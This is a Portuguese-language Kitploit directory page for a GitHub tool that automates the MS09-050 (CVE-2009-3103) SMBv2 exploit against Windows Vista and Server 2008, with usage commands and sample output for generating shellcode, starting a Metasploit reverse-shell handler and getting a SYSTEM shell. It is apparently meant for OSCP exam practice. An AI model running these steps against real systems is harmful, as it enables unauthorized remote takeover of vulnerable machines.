Skip to content
KitploitKITPLOIT
FerramentasBlog
Log in
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
ms09-050-CVE-2009-3103-exploit — Wrapper automatizado de exploit para MS09-050 (CVE-2009-3103) direcionado ao SMBv2 no Windows Vista/Server 2008. Gera shellcode, constrói o exploit e cria um handler do Metasploit para acesso ao shell como SYSTEM. | Kitploit
Ferramentas/GitHubGitHub/nicolasdamians/ms09-050-cve-2009-3103-exploit
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoShellcodeTestes de PenetraçãoAprendizado e Educação
GitHubnicolasdamians/ms09-050-cve-2009-3103-exploit

ms09-050-CVE-2009-3103-exploit

Wrapper automatizado de exploit para MS09-050 (CVE-2009-3103) direcionado ao SMBv2 no Windows Vista/Server 2008. Gera shellcode, constrói o exploit e cria um handler do Metasploit para acesso ao shell como SYSTEM.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Ver Repositório
7há 9 mesesAinda não revisado
Compartilhar

Wrapper do Exploit MS09-050 SMBv2

Configuração em uma linha para exploração do MS09-050 (CVE-2009-3103). Sem complicação, sem depuração, simplesmente funciona.

Por quê?

A maioria dos scripts MS09-050 por aí exige injeção manual de shellcode, tem problemas de temporização com handlers, ou simplesmente não funciona. Este wrapper:

  • Gera shellcode com parâmetros corretos
  • Monta o exploit automaticamente
  • Cria um handler Metasploit pronto para uso
  • Diz exatamente o que executar

Feito para a preparação do OSCP, onde tempo é crucial.

Alvo

  • Vulnerabilidade: MS09-050 / CVE-2009-3103
  • Afetados: Windows Vista SP1/SP2, Windows Server 2008 (antes do R2)
  • Serviço: SMBv2 na porta 445
  • Resultado: shell SYSTEM

Requisitos

  • Kali Linux (ou qualquer distro com Metasploit)
  • msfvenom
  • msfconsole
  • python2
  • rpcclient (geralmente pré-instalado)

Uso

./ms09_050.sh <TARGET_IP> <YOUR_IP> [PORT]

Exemplo

./ms09_050.sh 192.168.233.40 192.168.45.232 443

Saída:

[*] Target: 192.168.233.40 | LHOST: 192.168.45.232 | LPORT: 443
[*] Generating shellcode...
[+] Files created:
    - exploit.py
    - handler.rc

=== RUN ===

Terminal 1:  msfconsole -q -r handler.rc
Terminal 2:  python2 exploit.py 192.168.233.40

Execução

  1. Terminal 1 - Inicie o handler:

    msfconsole -q -r handler.rc
    

    Aguarde por: Started reverse TCP handler on ...

  2. Terminal 2 - Execute o exploit:

    python2 exploit.py 192.168.233.40
    
  3. Verifique no Terminal 1 se você obteve o shell.

Notas

  • Usa payload staged (windows/shell/reverse_tcp) - funciona de forma confiável com o stager neste exploit
  • Se o exploit falhar, o alvo pode precisar de um reboot ou não está vulnerável
  • Porta 443 recomendada se a 4444 estiver filtrada

Créditos

Exploit original baseado no PoC MS09-050 do ohnozzy.

Licença

MIT - Faça o que quiser, apenas não seja mau.

Baixar ferramenta